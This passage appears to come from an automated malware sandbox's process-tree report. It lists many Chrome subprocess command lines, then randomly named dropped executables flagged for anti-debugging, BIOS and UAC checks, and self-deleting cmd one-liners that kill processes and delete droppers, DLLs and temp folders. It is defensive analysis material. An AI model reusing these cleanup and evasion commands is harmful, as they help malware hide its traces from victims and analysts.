- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:4904 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc15804f50,0x7ffc15804f60,0x7ffc15804f704⤵PID:2188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1536 /prefetch:24⤵PID:5360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1764 /prefetch:84⤵PID:5292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 /prefetch:84⤵PID:5388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2484 /prefetch:14⤵PID:5404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2492 /prefetch:14⤵PID:5416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:14⤵PID:5496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:14⤵PID:5528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:14⤵PID:4388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:14⤵PID:5692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:84⤵PID:5544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4032 /prefetch:84⤵PID:4484
-
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings4⤵PID:1752
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff78787a890,0x7ff78787a8a0,0x7ff78787a8b05⤵PID:3680
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4884 /prefetch:84⤵PID:5856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5508 /prefetch:84⤵PID:5872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5364 /prefetch:84⤵PID:5864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:84⤵PID:5840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3312 /prefetch:84⤵PID:6000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:84⤵PID:2664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5476 /prefetch:84⤵PID:192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5408 /prefetch:84⤵PID:2248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5824 /prefetch:84⤵PID:3856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2020 /prefetch:84⤵PID:4872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:84⤵PID:6128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6228 /prefetch:84⤵PID:2648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:84⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6384 /prefetch:84⤵PID:2240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6376 /prefetch:84⤵PID:3328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6928 /prefetch:84⤵PID:4340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6652 /prefetch:84⤵PID:2356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5344 /prefetch:84⤵PID:5000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5504 /prefetch:84⤵PID:428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3424 /prefetch:84⤵PID:5768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3400 /prefetch:84⤵PID:5760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1708 /prefetch:84⤵PID:5752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5552 /prefetch:84⤵PID:3120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5384 /prefetch:84⤵PID:3864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5536 /prefetch:84⤵PID:4888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4012 /prefetch:84⤵PID:2096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7468 /prefetch:84⤵PID:816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5132 /prefetch:84⤵PID:5504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6520 /prefetch:84⤵PID:5608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7332 /prefetch:84⤵PID:3364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4964 /prefetch:84⤵PID:4680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4856 /prefetch:84⤵PID:4784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6516 /prefetch:84⤵PID:4104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7188 /prefetch:84⤵PID:5720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6944 /prefetch:84⤵PID:5908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6956 /prefetch:84⤵PID:5916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6392 /prefetch:84⤵PID:5824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1336 /prefetch:84⤵PID:5592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5208 /prefetch:84⤵PID:5564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:14⤵PID:4180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:14⤵PID:1824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7532 /prefetch:24⤵PID:4548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:14⤵PID:5536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5360 /prefetch:84⤵PID:4872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6164 /prefetch:84⤵PID:4644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5780 /prefetch:84⤵PID:4428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6516 /prefetch:84⤵PID:2632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1396 /prefetch:84⤵PID:820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6540 /prefetch:84⤵PID:2756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:84⤵PID:6084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3336 /prefetch:84⤵PID:728
-
-
-
-
C:\Users\Admin\Documents\5asy6n6oyspaENRUkZtA5Qzq.exe"C:\Users\Admin\Documents\5asy6n6oyspaENRUkZtA5Qzq.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4316 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5asy6n6oyspaENRUkZtA5Qzq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5asy6n6oyspaENRUkZtA5Qzq.exe" & del C:\ProgramData\*.dll & exit3⤵PID:5540
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5asy6n6oyspaENRUkZtA5Qzq.exe /f4⤵
- Kills process with taskkill
PID:3936
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:360
-
-
-
-
C:\Users\Admin\Documents\1e7R95rlQRS8XSN3FdabTAwe.exe"C:\Users\Admin\Documents\1e7R95rlQRS8XSN3FdabTAwe.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2880
-
-
C:\Users\Admin\Documents\kkfaipZZsCSio_SIEPN_fS7Q.exe"C:\Users\Admin\Documents\kkfaipZZsCSio_SIEPN_fS7Q.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5532 -
C:\Users\Admin\Documents\kkfaipZZsCSio_SIEPN_fS7Q.exeC:\Users\Admin\Documents\kkfaipZZsCSio_SIEPN_fS7Q.exe3⤵
- Executes dropped EXE
PID:5648
-
-
-
C:\Users\Admin\Documents\6aHyyuXvRg2Nf7uXsT2DRK2_.exe"C:\Users\Admin\Documents\6aHyyuXvRg2Nf7uXsT2DRK2_.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6072
-
-
C:\Users\Admin\Documents\xSLm9TxrFgsjNWJfMr70y5PL.exe"C:\Users\Admin\Documents\xSLm9TxrFgsjNWJfMr70y5PL.exe"2⤵
- Executes dropped EXE
PID:4572 -
C:\Users\Admin\Documents\xSLm9TxrFgsjNWJfMr70y5PL.exe"C:\Users\Admin\Documents\xSLm9TxrFgsjNWJfMr70y5PL.exe"3⤵
- Executes dropped EXE
PID:5016
-
-
-
C:\Users\Admin\Documents\lmADWHMCKuJKoLPUfWwB_mkn.exe"C:\Users\Admin\Documents\lmADWHMCKuJKoLPUfWwB_mkn.exe"2⤵
- Executes dropped EXE
PID:2728 -
C:\Users\Admin\Documents\lmADWHMCKuJKoLPUfWwB_mkn.exe"C:\Users\Admin\Documents\lmADWHMCKuJKoLPUfWwB_mkn.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5620
-
-
-
C:\Users\Admin\Documents\SqCdxdUoq1RCWE_A0cLiPOjc.exe"C:\Users\Admin\Documents\SqCdxdUoq1RCWE_A0cLiPOjc.exe"2⤵
- Executes dropped EXE
PID:4788 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\83455048486.exe"3⤵PID:3224
-
C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\83455048486.exe"C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\83455048486.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4712 -
C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\83455048486.exe"C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\83455048486.exe"5⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5868 -
C:\Users\Admin\AppData\Local\Temp\1624584007826.exe"C:\Users\Admin\AppData\Local\Temp\1624584007826.exe"6⤵
- Executes dropped EXE
PID:6008
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\36196613693.exe" /mix3⤵PID:5328
-
C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\36196613693.exe"C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\36196613693.exe" /mix4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
PID:2564 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\lpjVCJfEaf & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\36196613693.exe"5⤵PID:5736
-
C:\Windows\SysWOW64\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:5576
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "SqCdxdUoq1RCWE_A0cLiPOjc.exe" /f & erase "C:\Users\Admin\Documents\SqCdxdUoq1RCWE_A0cLiPOjc.exe" & exit3⤵PID:2692
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "SqCdxdUoq1RCWE_A0cLiPOjc.exe" /f4⤵
- Kills process with taskkill
PID:6064
-
-
-
-
C:\Users\Admin\Documents\ae9v_KHZDBou_RKNbj1dJPjn.exe"C:\Users\Admin\Documents\ae9v_KHZDBou_RKNbj1dJPjn.exe"2⤵
- Executes dropped EXE
PID:4628
-
-
C:\Users\Admin\Documents\XM2GDOsP0pGcjrblTowiJBOv.exe"C:\Users\Admin\Documents\XM2GDOsP0pGcjrblTowiJBOv.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5912 -
